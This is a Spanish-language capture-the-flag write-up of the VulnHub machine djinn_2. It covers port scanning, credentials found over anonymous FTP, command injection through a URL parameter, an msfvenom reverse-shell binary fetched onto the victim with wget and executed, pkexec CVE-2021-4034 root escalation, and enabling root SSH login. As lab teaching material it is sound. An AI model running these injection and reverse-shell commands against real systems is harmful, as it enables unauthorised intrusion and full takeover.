Write Up djinn_2 VulnHub
Escaneo de puertos
nmap -p- --min-rate 5000 -sV <IP>Info:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-02 10:37 EDT
Nmap scan report for 192.168.5.163
Host is up (0.00034s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.5.162
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 14 Jan 12 2020 creds.txt
| -rw-r--r-- 1 0 0 280 Jan 19 2020 game.txt
|_-rw-r--r-- 1 0 0 275 Jan 19 2020 message.txt
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 22:3c:7f:28:79:44:01:ca:55:d2:48:6d:06:5d:cd:ac (RSA)
| 256 71:e4:82:a4:95:30:a0:47:d5:14:fe:3b:c0:10:6c:d8 (ECDSA)
|_ 256 ce:77:48:33:be:27:98:4b:5e:4d:62:2f:a3:33:43:a7 (ED25519)
1337/tcp open waste?
| fingerprint-strings:
| GenericLines:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| @0xmzfr, Thanks for hiring me.
| Since I know how much you like to play game. I'm adding another game in this.
| Math game
| Catch em all
| Exit
| Stop acting like a hacker for a damn minute!!
| NULL:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| @0xmzfr, Thanks for hiring me.
| Since I know how much you like to play game. I'm adding another game in this.
| Math game
| Catch em all
|_ Exit
5000/tcp open http Werkzeug httpd 0.16.0 (Python 3.6.9)
|_http-title: 405 Method Not Allowed
|_http-server-header: Werkzeug/0.16.0 Python/3.6.9
7331/tcp open http Werkzeug httpd 0.16.0 (Python 3.6.9)
|_http-title: Lost in space
|_http-server-header: Werkzeug/0.16.0 Python/3.6.9
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.94SVN%I=7%D=6/2%Time=665C83C0%P=x86_64-pc-linux-gnu%r(
SF:NULL,1DD,"\x20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20_
SF:_\x20_\x20_\x20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x
SF:20__\x20___\x20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'
SF:_\x20`\x20_\x20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_
SF:\x20`\x20_\x20\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\
SF:|\x20\|\x20\|\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x2
SF:0\|\x20\|\x20\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\
SF:|\x20\|_\|\\___\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\n\nHey\x20@0xmzfr,\x20Thanks\x20for\x20hiring\x20me\.\nSince\x20I\x20
SF:know\x20how\x20much\x20you\x20like\x20to\x20play\x20game\.\x20I'm\x20ad
SF:ding\x20another\x20game\x20in\x20this\.\n1\.\x20Math\x20game\n2\.\x20Ca
SF:tch\x20em\x20all\n3\.\x20Exit\n>\x20")%r(GenericLines,20B,"\x20\x20____
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\x20_\x20_\x20__\x20_
SF:__\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20__\x20___\x20\x20\x2
SF:0___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\x20`\x20_\x20\\\x20/
SF:\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x20`\x20_\x20\\\x20/\
SF:x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\x20\|\x20\|\x20\|\x2
SF:0\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\|\x20\|\x20\|\x20\|\
SF:x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\x20\|_\|\\___\|\x20\
SF:x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\nHey\x20@0xmzfr,\x
SF:20Thanks\x20for\x20hiring\x20me\.\nSince\x20I\x20know\x20how\x20much\x2
SF:0you\x20like\x20to\x20play\x20game\.\x20I'm\x20adding\x20another\x20gam
SF:e\x20in\x20this\.\n1\.\x20Math\x20game\n2\.\x20Catch\x20em\x20all\n3\.\
SF:x20Exit\n>\x20Stop\x20acting\x20like\x20a\x20hacker\x20for\x20a\x20damn
SF:\x20minute!!\n");
MAC Address: 00:0C:29:D0:F2:64 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.34 ms 192.168.5.163
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.63 secondsftp
ftp anonymous@<IP>get creds.txt
get game.txt
get message.txtLo que contiene cada uno es lo siguiente...
creds.txt
nitu:7846A$56game.txt
@0xmzfr I would like to thank you for hiring me. I won't disappoint you like SAM.
Also I've started implementing the secure way of authorizing the access to our
network. I have provided @nitish81299 with the beta version of the key fob
hopes everything would be good.
- @Ugtan_message.txt
@nitish81299, you and sam messed it all up. I've fired sam for all the fuzz he created and
this will be your last warning if you won't put your shit together than you'll be gone as well.
I've hired @Ugtan_ as our new security head, hope he'll do something good.
- @0xmzfrPuerto 1337
Si nos vamos a este puerto mediante una pagina web, encontraremos la siguiente pagina...
____ _____ _
/ ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| | _ / _` | '_ ` _ \ / _ \ | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | | __/ | | | | | | | | | __/
\____|\__,_|_| |_| |_|\___| |_| |_|_| |_| |_|\___|
Hey @0xmzfr, Thanks for hiring me.
Since I know how much you like to play game. I'm adding another game in this.
1. Math game
2. Catch em all
3. Exit
> Stop acting like a hacker for a damn minute!!Pero si nos conectamos de la siguiente manera...
nc <IP> 1337Info:
____ _____ _
/ ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| | _ / _` | '_ ` _ \ / _ \ | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | | __/ | | | | | | | | | __/
\____|\__,_|_| |_| |_|\___| |_| |_|_| |_| |_|\___|
Hey @0xmzfr, Thanks for hiring me.
Since I know how much you like to play game. I'm adding another game in this.
1. Math game
2. Catch em all
3. Exit
> Por lo que parece es un juego...
Si completamos el juego de matematicas, nos dira lo siguiente...
> 1
I see you wanna do some Mathematics. I think you know the rule
Let's start then
4 + 1
> 5
9 + 3
> 12
Look up at the stars and not down at your feet. Try to make sense of what you see, and wonder about what makes the universe exist. Be curious.
-- Stephen (not morris)Puerto 5000
Si hacemos lo siguiente...
curl -I -X GET http://<IP>:5000Info:
HTTP/1.0 405 METHOD NOT ALLOWED
Content-Type: text/html
Allow: POST, OPTIONS
Content-Length: 178
Server: Werkzeug/0.16.0 Python/3.6.9
Date: Sun, 02 Jun 2024 14:57:22 GMTVemos que solo admite POST, por lo que haremos lo siguiente...
curl -X POST -d "comment=<script>alert('XSS');</script>" http://192.168.5.163:5000Info:
Access Denied!!Por lo que entendemos que tiene que haber algun login en alguna parte...
Puerto 7331
Si nos vamos a la web, encontraremos una pagina normal, pero si escaneamos puertos...
gobuster dir -u http://<IP>:7331/ -w <WORDLIST> -x html,php,txt -t 50 -k -rInfo:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.5.163:7331/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/robots.txt (Status: 200) [Size: 10]
/robots.txt (Status: 200) [Size: 10]
/source (Status: 200) [Size: 1280]
/wish (Status: 200) [Size: 456]
Progress: 81876 / 81880 (100.00%)
===============================================================
Finished
===============================================================Encontramos lo siguiente, en el /robots.txt encontramos esto...
/letshackLo que parece ser una URL de un directorio...
Pero si vamos a /source nos descarga un archivo que contiene lo siguiente...
import re
from time import sleep
import requests
URL = "http://{}:5000/?username={}&password={}"
def check_ip(ip: str):
"""
Check whether the input IP is valid or not
"""
if re.match(r'^(?:(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])'
'(\.(?!$)|$)){4}$', ip):
return True
else:
return False
def catcher(host, username, password):
try:
url = URL.format(host, username, password)
requests.post(url)
sleep(3)
except Exception:
pass
print("Unable to connect to the server!!")
def main():
print("If you have this then congratulations on being a part of an awesome organization")
print("This key will help you in connecting to our system securely.")
print("If you find any issue please report it to ugtan@djinn.io")
ip = input('\nIP of the machine: ')
username = input('Your username: ')
password = input('Your password: ')
if ip and check_ip(ip) and username == "REDACTED" and password == "REDACTED":
print("Verifiying %s with host %s " % (username, ip))
catcher(ip, username, password)
else:
print("Invalid IP address given")
if __name__ == "__main__":
main()Lo que parece un script de python de un login en el puerto 5000 y con las credenciales que encontramos anterior mente probaremos...
mv source source.pypython3 source.pySi hacemos eso e intentamos meter las credenciales anteriores no nos funcionara, por lo que haremos lo siguiente con la siguiente herramienta...
curl
Siguiendo ese codigo de python haremos lo siguiente...
curl -X POST 'http://<IP>:5000/?username=ls&password=test'Info:
app.pyPor lo que fue exitoso la inyeccion de codigo...
Crearemos un script de python para que nos codifique la URL y asi podamos de hacer inyeccion de codigo concatenando varios comandos...
import urllib.parse
username = "<COMMAND>"
password = "test"
# Codificar los parámetros de la URL
encoded_username = urllib.parse.quote(username)
encoded_password = urllib.parse.quote(password)
# Construir la URL codificada
url = f"http://<IP>:5000/?username={encoded_username}&password={encoded_password}"
print(url)Si donde pone <COMMAND> ponemos un cat /etc/passwd y lo ejecutamos, obtendremos lo siguiente...
python3 <SCRIPT_PYTHON>.pyInfo:
http://<IP>:5000/?username=cat%20/etc/passwd&password=testPor lo que lo enviamos con curl...
curl -X POST 'http://<IP>:5000/?username=cat%20/etc/passwd&password=test'Info:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
nitish:x:1000:1000:nitish,,,:/home/nitish:/bin/bash
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
ugtan:x:1001:1001:umang taneja,,,:/home/ugtan:/bin/bash
ftp:x:111:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
postfix:x:112:117::/var/spool/postfix:/usr/sbin/nologinPor lo que vemos hay 2 usuarios llamados nitish y ugtan...
Lo que haremos sera un payload para poder hacernos una shell mediante metasploit ya que esta sanitizadas las Reverse Shell's...
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf -o payload.elfInfo:
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 68 bytes
Final size of elf file: 152 bytes
Saved as: payload.elfPreparamos el metasploit...
msfconsole -q#Utilizar el siguiente exploit
use multi/handler
#Configurar payload anterior
set payload linux/x86/shell_reverse_tcp
#Configuracion
show options
set LHOST <IP>
set LPORT <PORT>
#Iniciar para estar a la escucha
runUna vez estando a la escucha en otra pestaña, vamos a pasarnos nuestro payload al servidor victima mediante python...
python3 -m http.servercurl -X POST 'http://<VICTIM_IP>:5000/?username=wget%20-P%20/tmp/%20http%3A//<YOUR_IP>%3A8000/payload.elf&password=test'Lo enviamos al directorio /tmp...
curl -X POST 'http://<IP>:5000/?username=ls%20-la%20/tmp&password=test'Info:
total 44
drwxrwxrwt 10 root root 4096 Jun 3 00:38 .
drwxr-xr-x 23 root root 4096 Dec 21 2019 ..
drwxrwxrwt 2 root root 4096 Jun 2 20:06 .font-unix
drwxrwxrwt 2 root root 4096 Jun 2 20:06 .ICE-unix
-rw-r--r-- 1 www-data www-data 152 Jun 3 00:29 payload.elf
drwx------ 3 root root 4096 Jun 2 20:06 systemd-private-20399c7c7bf14ecbae4fbc795198fa4a-systemd-resolved.service-uPLypV
drwx------ 3 root root 4096 Jun 2 20:06 systemd-private-20399c7c7bf14ecbae4fbc795198fa4a-systemd-timesyncd.service-1BIRZa
drwxrwxrwt 2 root root 4096 Jun 2 20:06 .Test-unix
drwx------ 2 root root 4096 Jun 2 23:47 vmware-root
drwxrwxrwt 2 root root 4096 Jun 2 20:06 .X11-unix
drwxrwxrwt 2 root root 4096 Jun 2 20:06 .XIM-unixComo veremos se paso todo perfectamente, ahora haremos lo siguiente para ejecutarlo...
curl -X POST 'http://<IP>:5000/?username=chmod%20%2Bx%20/tmp/payload.elf&password=test'Le añadimos permisos de ejecucion y ahora lo ejecutamos...
curl -X POST 'http://<IP>:5000/?username=/tmp/payload.elf&password=test'Una vez hecho eso si nos volvemos a nuestro metasploit habremos hecho conexion...
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.5.162:443
[*] Command shell session 1 opened (192.168.5.162:443 -> 192.168.5.163:46830) at 2024-06-02 15:19:27 -0400
whoami
www-dataYa seremos el usuario www-data...
Si hacemos lo siguiente...
find / -type f -perm -4000 -ls 2>/dev/null
285086 80 -rwsr-xr-x 1 root root 80056 Apr 2 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
285640 100 -rwsr-sr-x 1 root root 101208 Apr 16 2018 /usr/lib/snapd/snap-confine
262612 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
287000 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
538740 16 -rwsr-xr-x 1 root root 14328 Mar 27 2018 /usr/lib/policykit-1/polkit-agent-helper-1
262602 44 -rwsr-xr-- 1 root messagebus 42992 Nov 16 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
283747 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
262276 76 -rwsr-xr-x 1 root root 76496 Jan 25 2018 /usr/bin/chfn
285442 40 -rwsr-xr-x 1 root root 37136 Jan 25 2018 /usr/bin/newuidmap
262491 148 -rwsr-xr-x 1 root root 149080 Jan 18 2018 /usr/bin/sudo
285441 40 -rwsr-xr-x 1 root root 37136 Jan 25 2018 /usr/bin/newgidmap
262411 60 -rwsr-xr-x 1 root root 59640 Jan 25 2018 /usr/bin/passwd
262341 76 -rwsr-xr-x 1 root root 75824 Jan 25 2018 /usr/bin/gpasswd
283134 20 -rwsr-xr-x 1 root root 18448 Mar 10 2017 /usr/bin/traceroute6.iputils
262400 40 -rwsr-xr-x 1 root root 40344 Jan 25 2018 /usr/bin/newgrp
285527 24 -rwsr-xr-x 1 root root 22520 Mar 27 2018 /usr/bin/pkexec
262278 44 -rwsr-xr-x 1 root root 44528 Jan 25 2018 /usr/bin/chsh
536814 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
536260 144 -rwsr-xr-x 1 root root 146128 Dec 1 2017 /bin/ntfs-3g
524358 64 -rwsr-xr-x 1 root root 64424 Mar 10 2017 /bin/ping
524376 44 -rwsr-xr-x 1 root root 44664 Jan 25 2018 /bin/su
524393 28 -rwsr-xr-x 1 root root 26696 Mar 16 2018 /bin/umount
524349 44 -rwsr-xr-x 1 root root 43088 Mar 16 2018 /bin/mountVeremos esta linea de aqui...
285527 24 -rwsr-xr-x 1 root root 22520 Mar 27 2018 /usr/bin/pkexecEsto actua como un /bin/bash con permisos de SUID, por lo que haremos lo siguiente...
URL = https://github.com/Almorabea/pkexec-exploit
Esto nos lo llevaremos al servidor victima, ya sea copiando el contenido de python o transferirlo con algun comando como curl o wget, una vez teniendolo dentro...
chmod +x CVE-2021-4034.pypython3 CVE-2021-4034.pyParecera que no funciona y se quedara pillado en la opcion de elegir n, pero si hacemos ^C y despues cuando nos pregunte le damos a la n de nuevo y hacemos un whoami veremos que somos el usuario root...
Info:
Do you want to choose a custom payload? y/n (n use default payload) n
^C
Abort session 1? [y/N] n
[*] Aborting foreground process in the shell session
sh: 1: : not found
whoami
root
id
uid=0(root) gid=33(www-data) groups=33(www-data)Por lo que leeremos la flag de la siguiente manera...
./proof.shproof.sh (flagfinal)
TERM environment variable not set.
./proof.sh: line 9: figlet: command not found
djinn-2 pwned...
__________________________________________________________________________
Proof: cHduZWQgZGppbm4tMiBsaWtlIGEgYm9zcwo=
Path: /root
Date: Mon Jun 3 00:59:40 IST 2024
Whoami: root
__________________________________________________________________________
By @0xmzfr
Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)
If you enjoyed this then consider donating (https://mzfr.github.io/donate/)
so I can continue to make these kind of challenges.Y para pulirlo mas, si queremos conectarnos desde un ssh con root...
passwd root
#Pasos
Enter new UNIX password: root
Retype new UNIX password: root
passwd: password updated successfullyecho "PermitRootLogin yes" | sudo tee -a /etc/ssh/sshd_config >/dev/nullsudo systemctl restart sshdY ahora nos conectamos desde el ssh...
ssh root@<IP>Info:
root@192.168.5.163's password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Jun 3 01:04:26 IST 2024
System load: 0.03 Processes: 155
Usage of /: 28.5% of 9.78GB Users logged in: 1
Memory usage: 37% IP address for eth0: 192.168.5.163
Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
244 packages can be updated.
136 updates are security updates.
New release '20.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Sun Jun 2 20:06:21 2024
root@djinn:~#Y ya seriamos root desde el ssh con una shell mas comoda...
Last updated